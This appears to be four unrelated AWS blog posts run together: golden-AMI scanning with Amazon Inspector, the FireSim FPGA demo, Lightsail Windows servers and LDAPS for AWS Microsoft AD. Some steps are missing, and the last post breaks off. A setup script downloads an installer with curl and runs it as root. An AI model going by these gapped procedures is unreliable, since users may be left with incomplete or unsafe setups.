As companies mature in their cloud journey, they implement layered security capabilities and practices in their cloud architectures. One such practice is to continually assess golden Amazon Machine Images (AMIs) for security vulnerabilities. AMIs provide the information required to launch an Amazon EC2 instance, which is a virtual server in the AWS Cloud. A golden AMI is an AMI that contains the latest security patches, software, configuration, and software agents that you need to install for logging, security maintenance, and performance monitoring. You can build and deploy golden AMIs in your environment, but the AMIs quickly become dated as new vulnerabilities are discovered.

A security best practice is to perform routine vulnerability assessments of your golden AMIs to identify if newly found vulnerabilities apply to them. If you identify a vulnerability, you can update your golden AMIs with the appropriate security patches, test the AMIs, and deploy the patched AMIs in your environment. In this blog post, I demonstrate how to use Amazon Inspector to set up such continuous vulnerability assessments to scan your golden AMIs routinely.

Solution overview

Amazon Inspector performs security assessments of Amazon EC2 instances by using AWS managed rules packages such as the Common Vulnerabilities and Exposures (CVEs) package. The solution in this post creates EC2 instances from golden AMIs and then runs an Amazon Inspector security assessment on the created instances. When the assessment results are available, the solution consolidates the findings and advises you about next steps. Furthermore, the solution schedules an Amazon CloudWatch Events rule to run the golden AMI vulnerability assessments on a regular basis.

The following solution diagram illustrates how this solution works.

Here’s how this solution works, as illustrated in the preceding diagram: a scheduled Amazon CloudWatch Events rule triggers the StartContinuousAssessment Lambda function, which reads the golden AMI metadata from a JSON parameter stored in the Systems Manager Parameter Store. Later in this blog post, I provide instructions for creating this JSON parameter.

For each AMI specified in the JSON parameter, the Lambda function creates an EC2 instance. When each instance starts, it installs the Amazon Inspector agent by using the user-data script provided in the JSON. The Lambda function then copies each golden AMI’s tags (you will assign custom metadata in the form of tags to each golden AMI when you set up the solution) to the corresponding EC2 instance. The function also adds a tag with the key continuous-assessment-instance and the value true; this tag identifies EC2 instances that require regular security assessments. Copying the AMI’s tags to the instance (and later, to the security findings for that instance) helps you trace each security finding back to the golden AMI it came from. After you analyze the security findings, you can patch your golden AMIs.

The first time the StartContinuousAssessment function runs, it creates:

An Amazon Inspector assessment target: The target identifies the EC2 instances to assess; this solution selects the instances that carry the continuous-assessment-instance=true tag.

An Amazon Inspector assessment template: The template contains a reference to the Amazon Inspector assessment target created in the preceding step and the AWS managed rules packages to evaluate, such as the Common Vulnerabilities and Exposures (CVEs) package.

For subsequent assessments, the StartContinuousAssessment function reuses the target and the template created during its first run.

Note: Amazon Inspector can start an assessment only after it finds at least one running Amazon Inspector agent. To allow EC2 instances to boot and the Amazon Inspector agent to start, the Lambda function waits four minutes. Because the assessment runs for approximately one hour and EC2 instances typically boot within a few minutes, all Amazon Inspector agents start before the assessment ends.

The Lambda function then runs the assessment. The Amazon Inspector agents collect behavior and configuration data, and pass it to Amazon Inspector. Amazon Inspector analyzes the data and generates Amazon Inspector findings, which are possible security findings you may need to address.

When the assessment completes, Amazon Inspector publishes an assessment-completion notification message to an Amazon SNS topic called ContinuousAssessmentCompleteTopic. SNS uses topics, which are communication channels for sending messages and subscribing to notifications.

The notification message published to SNS triggers the AnalyzeInspectorFindings Lambda function, which performs the following actions:

Associates the tags of each EC2 instance with security findings found for that EC2 instance. This enables you to identify the security findings using the app-name tag you specified for your golden AMIs. You can use the information provided in the findings to patch your golden AMIs.

Terminates all instances associated with the continuous-assessment-instance=true tag.

Aggregates the number of findings found for each EC2 instance by severity and then publishes a consolidated result to an SNS topic called ContinuousAssessmentResultsTopic.

How to deploy the solution

To deploy this solution, you must set it up in the AWS Region where you build your golden AMIs. If that AWS Region does not support Amazon Inspector, at the end of your continuous integration pipeline, you can copy your AMIs to an AWS Region where Amazon Inspector assessments are supported. To learn more about continuous integration pipelines, see What is Continuous Integration?

Run the supplied AWS CloudFormation template and subscribe to an SNS topic to receive assessment results – Set up the infrastructure required to run vulnerability assessments and subscribe to an SNS topic to receive assessment results via email.

Test golden AMI vulnerability assessments – Ensure you have successfully set up the required resources to run vulnerability assessments.

Set up a CloudWatch Events rule for triggering continuous golden AMI vulnerability assessments – Schedule the execution of vulnerability assessments on a regular basis.

1. Tag your golden AMIs

You can search assessment findings based on golden AMI tags after Amazon Inspector completes an assessment.

Choose your AMI from the list, and then choose Actions > Add/Edit Tags.

Choose Create Tag. In the Key column, type app-name. In the Value column, type your application name. Following the same steps, create the app-version and app-environment tags. Choose Save.
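
You can also tag the AMI from the AWS CLI; a sketch (the AMI ID and tag values are placeholders):

aws ec2 create-tags \
    --resources ami-xxxxxxxx \
    --tags Key=app-name,Value=MyApp Key=app-version,Value=1.0.0 Key=app-environment,Value=prod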

Now that you have tagged your golden AMIs, you need to create golden AMI metadata, which will be read by the StartContinuousAssessment function to initiate vulnerability assessments. You will store the golden AMI metadata in the Systems Manager Parameter Store.

This solution reads golden AMI metadata from a parameter stored in the Systems Manager Parameter Store. The metadata must be in JSON format and must contain the following information for each golden AMI:

Ami-Id

InstanceType

UserData

Step A: Find the AMI ID of your golden AMI.

An AMI ID uniquely identifies an AMI in an AWS Region and is a required parameter for launching an EC2 instance from a golden AMI. To find the AMI ID of your golden AMI, open the Amazon EC2 console, choose AMIs in the navigation pane, and note the value in the AMI ID column for your golden AMI.

Step B: Create the user-data script that installs the Amazon Inspector agent

The user-data script automates the installation of software packages when an EC2 instance launches for the first time. In this step, you create an operating system-specific, JSON-compatible user-data script that installs and starts the Amazon Inspector agent.

Based on Running Commands on Your Linux Instance at Launch, you make a Linux shell script user-data compatible by prefixing it with a #!/bin/bash line. In this step, you add the #!/bin/bash prefix to the script that installs the Amazon Inspector agent. The following is the user-data-compatible version of that script.
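
#!/bin/bash
# A minimal sketch of a user-data script that installs and starts the Amazon Inspector agent
# on an Amazon Linux-based golden AMI. Verify the agent download URL against the current
# Amazon Inspector documentation before you use it.
cd /tmp
curl -O https://inspector-agent.amazonaws.com/linux/latest/install
sudo bash install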

The user-data script provided in the JSON metadata must be JSON-compatible, which you will do next.

Step C: Make the user-data script JSON compatible

To make the user-data script JSON compatible, you must replace all new-line characters with a \r\n\r\n sequence. The following is the JSON-compatible user-data script that you specify for your Amazon Linux-based golden AMI in Step D.
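
(A sketch, based on the example script above; keep the entire value on a single line in your JSON document.)

"#!/bin/bash\r\n\r\ncd /tmp\r\n\r\ncurl -O https://inspector-agent.amazonaws.com/linux/latest/install\r\n\r\nsudo bash install"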

Repeat Steps A, B, and C to find the Ami Id, InstanceType, and UserData for each of your golden AMIs. When you have this metadata, you can create the JSON document of metadata for all your golden AMIs. The StartContinuousAssessment Lambda function reads this JSON to start golden AMI vulnerability assessments.
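
The following is a sketch of such a JSON document for two golden AMIs. All values are placeholders, and the exact key names must match what the StartContinuousAssessment function expects.

[
  {
    "Ami-Id": "<golden-AMI-1-id>",
    "InstanceType": "t2.medium",
    "UserData": "<JSON-compatible-user-data-for-golden-AMI-1>"
  },
  {
    "Ami-Id": "<golden-AMI-2-id>",
    "InstanceType": "t2.medium",
    "UserData": "<JSON-compatible-user-data-for-golden-AMI-2>"
  }
]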

Replace all placeholder values with values corresponding to your first golden AMI. If your golden AMI is Amazon Linux-based, you can specify the userData as the JSON-compatible-user-data-for-Amazon-Linux-AMI from Step C.5. Next, replace the placeholder values for your second golden AMI. You can add more entries to your JSON document, if you have more than two golden AMIs.

Note: The total number of characters in the JSON document must be 4,096 or fewer, and the number of golden AMIs must be fewer than 500. Also verify that your account’s EC2 limits allow you to run one On-Demand EC2 instance for each of your golden AMIs. For information about how to verify service limits, see Amazon EC2 Service Limits.

Now that you have created the JSON document of your golden AMIs, you will store the JSON document in a Systems Manager parameter. The StartContinuousAssessment Lambda function will read the metadata from this parameter.
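
If you prefer the AWS CLI to the console, a sketch of storing the metadata looks like the following. The parameter name and file name are placeholders; use the names your deployment expects, and remember the 4,096-character limit noted earlier.

aws ssm put-parameter \
    --name "ContinuousAssessmentInput" \
    --type "String" \
    --value file://golden-ami-metadata.json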

Choose Create subscription. In the Topic ARN field, paste the ARN of ContinuousAssessmentResultsTopic that you noted in the previous section.

In the Protocol drop-down, choose Email.

In the Endpoint box, type the email address where you will receive notifications.

Choose Create subscription.

Navigate to your email application and open the message from AWS Notifications. Click the link to confirm your subscription to the SNS topic.
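
The same subscription can also be created from the AWS CLI; a sketch (the topic ARN and email address are placeholders):

aws sns subscribe \
    --topic-arn arn:aws:sns:us-east-1:123456789012:ContinuousAssessmentResultsTopic \
    --protocol email \
    --notification-endpoint you@example.com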

4. Test golden AMI vulnerability assessments

Before you schedule vulnerability assessments, you should test the process by running the StartContinuousAssessment function. In this test, you trigger a security assessment and monitor it. You then receive an email after the assessment has completed, which shows that vulnerability assessments have been successfully set up.
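
If you prefer to trigger the test from the AWS CLI rather than the Lambda console, you can invoke the function directly. This is only a sketch: the payload key and parameter name are placeholders and must match the event format that your deployed function expects.

# With AWS CLI v2, also pass --cli-binary-format raw-in-base64-out
aws lambda invoke \
    --function-name StartContinuousAssessment \
    --payload '{"AMIsParamName": "ContinuousAssessmentInput"}' \
    response.json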

On Dashboard under Recent Assessment Runs, you will see an entry with the status, Collecting Data. This status indicates that Amazon Inspector agents are collecting data from instances running your golden AMIs. The agents collect data for an hour and then Amazon Inspector analyzes the collected data.

After Amazon Inspector completes the assessment, the status in the console changes to Analysis complete. Amazon Inspector then publishes an SNS message that triggers the AnalyzeInspectorFindings Lambda function. When AnalyzeInspectorFindings publishes results, you will receive an email containing consolidated assessment results. You also will be able to see the findings.

In the navigation pane, choose Assessment Runs. In the table on the Amazon Inspector – Assessment Runs page, choose the findings of the latest assessment run.

Choose the settings icon and choose the appropriate tags to see the details of findings, as shown in the following screenshot. The findings also contain information about how you can address each underlying vulnerability.

Having verified that you have successfully set up all components of golden AMI vulnerability assessments, you now will schedule the vulnerability assessments to run on a regular basis to give you continual insight into the health of instances created from your golden AMIs.

For Rule definition, type ContinuousGoldenAMIAssessmentTrigger as the name, and type This rule triggers the continuous golden AMI vulnerability assessment process as the description.

Choose Create rule.
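
If you prefer to create the rule from the AWS CLI, a sketch looks like the following. The schedule, account ID, and input event are placeholders; the input must match the event format that the StartContinuousAssessment function expects, and CloudWatch Events must be granted permission to invoke the function (for example, with aws lambda add-permission) if your deployment has not already set that up.

# Create a scheduled rule (weekly, as an example)
aws events put-rule \
    --name ContinuousGoldenAMIAssessmentTrigger \
    --schedule-expression "rate(7 days)" \
    --description "This rule triggers the continuous golden AMI vulnerability assessment process"

# Point the rule at the StartContinuousAssessment Lambda function
aws events put-targets \
    --rule ContinuousGoldenAMIAssessmentTrigger \
    --targets '[{"Id":"1","Arn":"arn:aws:lambda:us-east-1:123456789012:function:StartContinuousAssessment","Input":"{\"AMIsParamName\":\"ContinuousAssessmentInput\"}"}]'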

The vulnerability assessments are executed on the first occurrence of the schedule you chose while setting up the CloudWatch Events rule. After the vulnerability assessment is executed, you will receive an email to indicate that your continuous golden AMI vulnerability assessments are set up.

Summary

To get visibility into the security of your EC2 instances created from your golden AMIs, it is important that you perform security assessments of your golden AMIs on a regular basis. In this blog post, I have demonstrated how to set up vulnerability assessments, and the results of these continuous golden AMI vulnerability assessments can help you keep your environment up to date with security patches. To learn how to patch your golden AMIs, see Streamline AMI Maintenance and Patching Using Amazon EC2 Systems Manager.

If you have comments about this blog post, submit them in the “Comments” section below. If you have questions about implementing the solution in this post, start a new thread on the Amazon Inspector forum or contact AWS Support.

The recent addition of Xilinx FPGAs to AWS Cloud compute offerings is one way that AWS is enabling global growth in the areas of advanced analytics, deep learning and AI. The customized F1 servers use pooled accelerators, enabling interconnectivity of up to 8 FPGAs, each one including 64 GiB DDR4 ECC protected memory, with a dedicated PCIe x16 connection. That makes this a powerful engine with the capacity to process advanced analytical applications at scale, at a significantly faster rate. For example, AWS commercial partner Edico Genome is able to achieve an approximately 30X speedup in analyzing whole genome sequencing datasets using their DRAGEN platform powered with F1 instances.

While the availability of FPGA F1 compute on-demand provides clear accessibility and cost advantages, many mainstream users are still finding that the “threshold to entry” in developing or running FPGA-accelerated simulations is too high. Researchers at the UC Berkeley RISE Lab have developed FireSim, an open-source simulation platform powered by Amazon EC2 F1 instances. FireSim lowers that entry bar and makes it easier for everyone to leverage the power of an FPGA-accelerated compute environment. Whether you are part of a small start-up development team or working at a large datacenter scale, hardware-software co-design enables faster time-to-deployment, lower costs, and more predictable performance. We are excited to feature FireSim in this post from Sagar Karandikar and his colleagues at UC Berkeley.

―Mia Champion, Sr. Data Scientist, AWS

Figure 1. Mapping an 8-node FireSim cluster simulation to Amazon EC2 F1

As traditional hardware scaling nears its end, the data centers of tomorrow are trending towards heterogeneity, employing custom hardware accelerators and increasingly high-performance interconnects. Prototyping new hardware at scale has traditionally been either extremely expensive, or very slow. In this post, I introduce FireSim, a new hardware simulation platform under development in the computer architecture research group at UC Berkeley that enables fast, scalable hardware simulation using Amazon EC2 F1 instances.

FireSim benefits both hardware and software developers working on new rack-scale systems: software developers can use the simulated nodes with new hardware features as they would use a real machine, while hardware developers have full control over the hardware being simulated and can run real software stacks while hardware is still under development. In conjunction with this post, we’re releasing the first public demo of FireSim, which lets you deploy your own 8-node simulated cluster on an F1 Instance and run benchmarks against it. This demo simulates a pre-built “vanilla” cluster, but demonstrates FireSim’s high performance and usability.

Why FireSim + F1?

FPGA-accelerated hardware simulation is by no means a new concept. However, previous attempts to use FPGAs for simulation have been fraught with usability, scalability, and cost issues. FireSim takes advantage of EC2 F1 and open-source hardware to address the traditional problems with FPGA-accelerated simulation:

Problem #1: FPGA-based simulations have traditionally been expensive, difficult to deploy, and difficult to reproduce. FireSim uses public-cloud infrastructure like F1, which means no upfront cost to purchase and deploy FPGAs. Developers and researchers can distribute pre-built AMIs and AFIs, as in this public demo (more details later in this post), to make experiments easy to reproduce. FireSim also automates most of the work involved in deploying an FPGA simulation, essentially enabling one-click conversion from new RTL to deploying on an FPGA cluster.

Problem #2: FPGA-based simulations have traditionally been difficult (and expensive) to scale. Because FireSim uses F1, users can scale out experiments by spinning up additional EC2 instances, rather than spending hundreds of thousands of dollars on large FPGA clusters.

Problem #3: Finding open hardware to simulate has traditionally been difficult. Finding open hardware that can run real software stacks is even harder. FireSim simulates RocketChip, an open, silicon-proven, RISC-V-based processor platform, and adds peripherals like a NIC and disk device to build up a realistic system. Processors that implement RISC-V automatically support real operating systems (such as Linux) and even support applications like Apache and Memcached. We provide a custom Buildroot-based FireSim Linux distribution that runs on our simulated nodes and includes many popular developer tools.

Problem #4: Writing hardware in traditional HDLs is time-consuming. Both FireSim and RocketChip use the Chisel HDL, which brings modern programming paradigms to hardware description languages. Chisel greatly simplifies the process of building large, highly parameterized hardware components.

How to use FireSim for hardware/software co-design

FireSim drastically improves the process of co-designing hardware and software by acting as a push-button interface for collaboration between hardware developers and systems software developers. The following diagram describes the workflows that hardware and software developers use when working with FireSim.

Figure 2. The FireSim custom hardware development workflow.

The hardware developer’s view:

Write custom RTL for your accelerator, peripheral, or processor modification in a productive language like Chisel.

Run a software simulation of your hardware design in standard gate-level simulation tools for early-stage debugging.

Run FireSim build scripts, which automatically build your simulation, run it through the Vivado toolchain/AWS shell scripts, and publish an AFI.

Deploy your simulation on EC2 F1 using the generated simulation driver and AFI.

Run real software builds released by software developers to benchmark your hardware.

The software developer’s view:

Deploy the AMI/AFI generated by the hardware developer on an F1 instance to simulate a cluster of nodes (or scale out to many F1 nodes for larger simulated core-counts).

Connect using SSH to the simulated nodes in the cluster and boot the Linux distribution included with FireSim. This distribution is easy to customize, and already supports many standard software packages.

Directly prototype your software using the same exact interfaces that the software will see when deployed on the real future system you’re prototyping, with the same performance characteristics as observed from software, even at scale.

FireSim demo v1.0

Figure 3. Cluster topology simulated by FireSim demo v1.0.

This first public demo of FireSim focuses on the aforementioned “software-developer’s view” of the custom hardware development cycle. The demo simulates a cluster of 1 to 8 RocketChip-based nodes, interconnected by a functional network simulation. The simulated nodes work just like “real” machines: they boot Linux, you can connect to them using SSH, and you can run real applications on top. The nodes can see each other (and the EC2 F1 instance on which they’re deployed) on the network and communicate with one another. While the demo currently simulates a pre-built “vanilla” cluster, the entire hardware configuration of these simulated nodes can be modified after FireSim is open-sourced.

In this post, I walk through bringing up a single-node FireSim simulation for experienced EC2 F1 users. For more detailed instructions for new users and instructions for running a larger 8-node simulation, see FireSim Demo v1.0 on Amazon EC2 F1. Both demos walk you through setting up an instance from a demo AMI/AFI and booting Linux on the simulated nodes. The full demo instructions also walk you through an example workload, running Memcached on the simulated nodes, with YCSB as a load generator to demonstrate network functionality.

Deploying the demo on F1

In this release, we provide pre-built binaries for driving simulation from the host and a pre-built AFI that contains the FPGA infrastructure necessary to simulate a RocketChip-based node.

Starting your F1 instances

First, launch an f1.2xlarge instance using the free FireSim Demo v1.0 product available on the AWS Marketplace. After your instance has booted, log in using the user name centos. On the first login, you should see the message “FireSim network config completed.” This first-login configuration sets up the necessary tap interfaces and bridge on the EC2 instance to enable communication with the simulated nodes.

AMI contents

The AMI contains a variety of tools to help you run simulations and build software for RISC-V systems, including the riscv64 toolchain, a Buildroot-based Linux distribution that runs on the simulated nodes, and the simulation driver program. For more details, see the AMI Contents section on the FireSim website.

Single-node demo

First, you need to flash the FPGA with the FireSim AFI. To do so, run:
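
# A sketch using the standard AWS FPGA management tools on the instance; the AGFI ID
# below is a placeholder, so use the ID given in the FireSim demo instructions.
sudo fpga-load-local-image -S 0 -I agfi-0123456789abcdef0

# Confirm that the AFI is loaded on slot 0
sudo fpga-describe-local-image -S 0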

Next, start the simulation by running the boot script included in the AMI (the demo instructions give the exact command). The script automatically calls the simulation driver, telling it to load the Linux kernel image and root filesystem for the Linux distro. This produces output similar to the following:

Simulations Started. You can use the UART console of each simulated node by attaching to the following screens:

There is a screen on:

2492.fsim0 (Detached)

1 Socket in /var/run/screen/S-centos.

You could connect to the simulated UART console by attaching to this screen, but in this demo you use SSH to access the node instead.

First, ping the node to make sure it has come online. This is currently required because nodes may get stuck at Linux boot if the NIC does not receive any network traffic. For more information, see Troubleshooting/Errata. The node is always assigned the IP address 192.168.1.10:
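
# Check that the simulated node has come online (it is always at 192.168.1.10)
ping -c 3 192.168.1.10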

At this point, you know that the simulated node is online. You can connect to it using SSH with the user name root and password firesim. It is also convenient to make sure that your TERM variable is set correctly. In this case, the simulation expects TERM=linux, so provide that:
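
# Connect with the user name root (password: firesim); TERM set locally carries over to the node
TERM=linux ssh root@192.168.1.10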

Now you can run programs on the simulated node, as you would with a real machine. For an example workload (running YCSB against Memcached on the simulated node) or to run a larger 8-node simulation, see the full FireSim Demo v1.0 on Amazon EC2 F1 demo instructions.

Finally, when you are finished, you can shut down the simulated node by running the following command from within the simulated node:

# poweroff

You can confirm that the simulation has ended by running screen -ls, which should now report that there are no detached screens.

Future plans

At Berkeley, we’re planning to keep improving the FireSim platform to enable our own research in future data center architectures, like FireBox. The FireSim platform will eventually support more sophisticated processors, custom accelerators (such as Hwacha), network models, and peripherals, in addition to scaling to larger numbers of FPGAs. In the future, we’ll open source the entire platform, including Midas, the tool used to transform RTL into FPGA simulators, allowing users to modify any part of the hardware/software stack. Follow @firesimproject on Twitter to stay tuned to future FireSim updates.

Acknowledgements

FireSim is the joint work of many students and faculty at Berkeley: Sagar Karandikar, Donggyu Kim, Howard Mao, David Biancolin, Jack Koenig, Jonathan Bachrach, and Krste Asanović. This work is partially funded by AWS through the RISE Lab, by the Intel Science and Technology Center for Agile HW Design, and by ASPIRE Lab sponsors and affiliates Intel, Google, HPE, Huawei, NVIDIA, and SK hynix.

Today we are adding support for Windows-based Virtual Private Servers. You can launch a VPS that runs Windows Server 2012 R2, Windows Server 2016, or Windows Server 2016 with SQL Server 2016 Express and be up and running in minutes. You can use your VPS to build, test, and deploy .NET or Windows applications without having to set up or run any infrastructure. Backups, DNS management, and operational metrics are all accessible with a click or two.

Servers are available in five sizes, with 512 MB to 8 GB of RAM, 1 or 2 vCPUs, and up to 80 GB of SSD storage. Prices (including software licenses) start at $10 per month:

You can try out a 512 MB server for one month (up to 750 hours) at no charge.

Launching a Windows VPS

To launch a Windows VPS, log in to Lightsail, click on Create instance, and select the Microsoft Windows platform. Then click on Apps + OS if you want to run SQL Server 2016 Express, or OS Only if Windows is all you need:

If you want to use a PowerShell script to customize your instance after it launches for the first time, click on Add launch script and enter the script:

Choose your instance plan, enter a name for your instance(s), and select the quantity to be launched, then click on Create:

Your instance will be up and running within a minute or so:
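
If you prefer the AWS CLI, a roughly equivalent launch looks like the following sketch. The blueprint and bundle IDs vary; list the valid values with aws lightsail get-blueprints and aws lightsail get-bundles before launching.

aws lightsail create-instances \
    --instance-names MyWindowsVPS \
    --availability-zone us-east-1a \
    --blueprint-id windows_server_2016 \
    --bundle-id <bundle-id>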

Click on the instance, and then click on Connect using RDP:

This will connect using a built-in, browser-based RDP client (you can also use the IP address and the credentials with another client):

Available Today

This feature is available today in the US East (Northern Virginia), US East (Ohio), US West (Oregon), EU (London), EU (Ireland), EU (Frankfurt), Asia Pacific (Singapore), Asia Pacific (Mumbai), Asia Pacific (Sydney), and Asia Pacific (Tokyo) Regions.

Starting today, you can encrypt the Lightweight Directory Access Protocol (LDAP) communications between your applications and AWS Directory Service for Microsoft Active Directory, also known as AWS Microsoft AD. Many Windows and Linux applications use Active Directory’s (AD) LDAP service to read and write sensitive information about users and devices, including personally identifiable information (PII). Now, you can encrypt your AWS Microsoft AD LDAP communications end to end to protect this information by using LDAP Over Secure Sockets Layer (SSL)/Transport Layer Security (TLS), also called LDAPS. This helps you protect PII and other sensitive information exchanged with AWS Microsoft AD over untrusted networks.

Solution overview

Before going into specific deployment steps, I will provide a high-level overview of deploying LDAPS. I cover how you enable LDAPS on AWS Microsoft AD. In addition, I provide some general background about CA deployment models and explain how to apply these models when deploying Microsoft CA to enable LDAPS on AWS Microsoft AD.

How you enable LDAPS on AWS Microsoft AD

LDAP-aware applications (LDAP clients) typically access LDAP servers using Transmission Control Protocol (TCP) on port 389. By default, LDAP communications on port 389 are unencrypted. However, many LDAP clients use one of two standards to encrypt LDAP communications: LDAP over SSL on port 636, and LDAP with StartTLS on port 389. If an LDAP client uses port 636, the LDAP server encrypts all traffic unconditionally with SSL. If an LDAP client issues a StartTLS command when setting up the LDAP session on port 389, the LDAP server encrypts all traffic to that client with TLS. AWS Microsoft AD now supports both encryption standards when you enable LDAPS on your AWS Microsoft AD domain controllers.

You enable LDAPS on your AWS Microsoft AD domain controllers by installing a digital certificate that a CA issued. Though Windows servers have different methods for installing certificates, LDAPS with AWS Microsoft AD requires you to add a Microsoft CA to your AWS Microsoft AD domain and deploy the certificate through autoenrollment from the Microsoft CA. The installed certificate enables the LDAP service running on domain controllers to listen for and negotiate LDAP encryption on port 636 (LDAP over SSL) and port 389 (LDAP with StartTLS).

Background of CA deployment models

You can deploy CAs as part of a single-level or multi-level CA hierarchy. In a single-level hierarchy, all certificates come from the root of the hierarchy. In a multi-level hierarchy, you organize a collection of CAs in a hierarchy and the certificates sent to computers and users come from subordinate CAs in the hierarchy (not the root).

Certificates issued by a CA identify the hierarchy to which the CA belongs. When a computer sends its certificate to another computer for verification, the receiving computer must have the public certificate from the CAs in the same hierarchy as the sender. If the CA that issued the certificate is part of a single-level hierarchy, the receiver must obtain the public certificate of the CA that issued the certificate. If the CA that issued the certificate is part of a multi-level hierarchy, the receiver can obtain a public certificate for all the CAs that are in the same hierarchy as the CA that issued the certificate. If the receiver can verify that the certificate came from a CA that is in the hierarchy of the receiver’s “trusted” public CA certificates, the receiver trusts the sender. Otherwise, the receiver rejects the sender.

Deploying Microsoft CA to enable LDAPS on AWS Microsoft AD

Microsoft offers a standalone CA and an enterprise CA. Though you can configure either as single-level or multi-level hierarchies, only the enterprise CA integrates with AD and offers autoenrollment for certificate deployment. Because you cannot sign in to run commands on your AWS Microsoft AD domain controllers, an automatic certificate enrollment model is required. Therefore, AWS Microsoft AD requires the certificate to come from a Microsoft enterprise CA that you configure to work in your AD domain. When you install the Microsoft enterprise CA, you can configure it to be part of a single-level hierarchy or a multi-level hierarchy. As a best practice, AWS recommends a multi-level Microsoft CA trust hierarchy consisting of a root CA and a subordinate CA. I cover only a multi-level hierarchy in this post.

In a multi-level hierarchy, you configure your subordinate CA by importing a certificate from the root CA. You must issue a certificate from the root CA such that the certificate gives your subordinate CA the right to issue certificates on behalf of the root. This makes your subordinate CA part of the root CA hierarchy. You also deploy the root CA’s public certificate on all of your computers, which tells all your computers to trust certificates that your root CA issues and to trust certificates from any authorized subordinate CA.

In such a hierarchy, you typically leave your root CA offline (inaccessible to other computers in the network) to protect the root of your hierarchy. You leave the subordinate CA online so that it can issue certificates on behalf of the root CA. This multi-level hierarchy increases security because if someone compromises your subordinate CA, you can revoke all certificates it issued and set up a new subordinate CA from your offline root CA. To learn more about setting up a secure CA hierarchy, see Securing PKI: Planning a CA Hierarchy.

When a Microsoft CA is part of your AD domain, you can configure certificate templates that you publish. These templates become visible to client computers through AD. If a client’s profile matches a template, the client requests a certificate from the Microsoft CA that matches the template. Microsoft calls this process autoenrollment, and it simplifies certificate deployment. To enable LDAPS on your AWS Microsoft AD domain controllers, you create a certificate template in the Microsoft CA that generates SSL and TLS-compatible certificates. The domain controllers see the template and automatically import a certificate of that type from the Microsoft CA. The imported certificate enables LDAP encryption.

Steps to enable LDAPS for your AWS Microsoft AD directory

The rest of this post is composed of the steps for enabling LDAPS for your AWS Microsoft AD directory. First, though, I explain which components you must have running to deploy this solution successfully. I also explain how this solution works and include an architecture diagram.

Prerequisites

The instructions in this post assume that you already have the following components running:

The solution setup

The following diagram illustrates the setup with the steps you need to follow to enable LDAPS for AWS Microsoft AD. You will learn how to set up a subordinate Microsoft enterprise CA (in this case, SubordinateCA) and join it to your AWS Microsoft AD domain (in this case, corp.example.com). You also will learn how to create a certificate template on SubordinateCA and configure AWS security group rules to enable LDAPS for your directory.

As a prerequisite, I already created a standalone Microsoft root CA (in this case RootCA) for creating SubordinateCA. RootCA also has a local user account called RootAdmin that has administrative permissions to issue certificates to SubordinateCA. Note that you may already have a root CA or a multi-level CA hierarchy in your on-premises network that you can use for creating SubordinateCA instead of creating a new root CA. If you choose to use your existing on-premises CA hierarchy, you must have administrative permissions on your on-premises CA to issue a certificate to SubordinateCA.

Lastly, I also already created an Amazon EC2 instance (in this case, Management) that I use to manage users, configure AWS security groups, and test the LDAPS connection. I join this instance to the AWS Microsoft AD directory domain.

Add a Microsoft enterprise CA to your AWS Microsoft AD domain (in this case, SubordinateCA) so that it can issue certificates to your directory domain controllers to enable LDAPS. This step includes joining SubordinateCA to your directory domain, installing the Microsoft enterprise CA, and obtaining a certificate from RootCA that grants SubordinateCA permissions to issue certificates.

I now will show you these steps in detail. I use the names of components—such as RootCA, SubordinateCA, and Management—and refer to users—such as Admin, RootAdmin, and CAAdmin—to illustrate who performs these steps. All component names and user names in this post are used for illustrative purposes only.

Deploy the solution

Step 1: Delegate permissions to CA administrators

In this step, you delegate permissions to your users who manage your CAs. Your users then can join a subordinate CA to your AWS Microsoft AD domain and create the certificate template in your CA.

Step 2: Add a Microsoft enterprise CA to your AWS Microsoft AD domain

In this step, you set up a subordinate Microsoft enterprise CA and join it to your AWS Microsoft AD directory domain. I will summarize the process first and then walk through the steps.

First, you create an Amazon EC2 for Windows Server instance called SubordinateCA and join it to the domain, corp.example.com. You then publish RootCA’s public certificate and certificate revocation list (CRL) to SubordinateCA’s local trusted store. You also publish RootCA’s public certificate to your directory domain. Doing so enables SubordinateCA and your directory domain controllers to trust RootCA. You then install the Microsoft enterprise CA service on SubordinateCA and request a certificate from RootCA to make SubordinateCA a subordinate Microsoft CA. After RootCA issues the certificate, SubordinateCA is ready to issue certificates to your directory domain controllers.

Note that you can use an Amazon S3 bucket to pass the certificates between RootCA and SubordinateCA.

In detail, here is how the process works, as illustrated in the preceding diagram:

Set up an Amazon EC2 instance joined to your AWS Microsoft AD directory domain – Create an Amazon EC2 for Windows Server instance to use as a subordinate CA, and join it to your AWS Microsoft AD directory domain. For this example, the machine name is SubordinateCA and the domain is corp.example.com.

Share RootCA’s public certificate with SubordinateCA – Log in to RootCA as RootAdmin and start Windows PowerShell with administrative privileges. Run the following commands to copy RootCA’s public certificate and CRL to the folder c:\rootcerts on RootCA.
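
# A sketch, assuming the default Windows CA paths; adjust file names and paths for your environment
New-Item c:\rootcerts -type directory
certutil -ca.cert c:\rootcerts\rootca.crt
copy C:\Windows\System32\CertSrv\CertEnroll\*.crl c:\rootcerts\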

The following screenshot shows RootCA’s public certificate and CRL uploaded to an S3 bucket.

Publish RootCA’s public certificate to your directory domain – Log in to SubordinateCA as the CAAdmin. Download RootCA’s public certificate and CRL from the S3 bucket by following the instructions in How Do I Download an Object from an S3 Bucket? Save the certificate and CRL to the C:\rootcerts folder on SubordinateCA. Add RootCA’s public certificate and the CRL to the local store of SubordinateCA and publish RootCA’s public certificate to your directory domain by running the following commands using Windows PowerShell with administrative privileges.
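
# A sketch; the file names are placeholders, so use the certificate and CRL files you downloaded
certutil -addstore -f root c:\rootcerts\rootca.crt
certutil -addstore -f root c:\rootcerts\rootca.crl
certutil -dspublish -f c:\rootcerts\rootca.crt RootCA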

Install the subordinate Microsoft enterprise CA – Install the subordinate Microsoft enterprise CA on SubordinateCA by following the instructions in Install a Subordinate Certification Authority. Ensure that you choose Enterprise CA for Setup Type to install an enterprise CA.

For the CA Type, choose Subordinate CA.

Request a certificate from RootCA – Next, copy the certificate request on SubordinateCA to a folder called c:\CARequest by running the following commands using Windows PowerShell with administrative privileges.

New-Item c:\CARequest -type directory
Copy c:\*.req C:\CARequest

Upload the certificate request to the S3 bucket.

Approve SubordinateCA’s certificate request – Log in to RootCA as RootAdmin and download the certificate request from the S3 bucket to a folder called CARequest. Submit the request by running the following command using Windows PowerShell with administrative privileges.
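
# A sketch; the request file name is a placeholder, so use the .req file you downloaded
certreq -submit c:\CARequest\SubordinateCA.req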

In the Certification Authority window, expand the ROOTCA tree in the left pane and choose Pending Requests. In the right pane, note the value in the Request ID column. Right-click the request and choose All Tasks > Issue.

